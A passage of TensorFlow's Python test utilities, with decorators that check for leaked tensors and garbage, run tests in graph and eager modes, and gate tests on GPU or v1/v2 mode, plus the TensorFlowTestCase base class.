func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only comptaible in v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class shold be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
# The description is just for documentation purposes.
def disable_all_xla(description):
def disable_all_impl(cls):
"""Execute all test methods in this class only if xla is not enabled."""
base_decorator = disable_xla
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and not name == "test_session":
setattr(cls, name, base_decorator(description)(value))
return cls
return disable_all_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
os.putenv(
"TF_XLA_FLAGS", "--tf_xla_auto_jit=2 --tf_xla_min_cluster_size=1 "
"--tf_xla_enable_lazy_compilation=false")
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
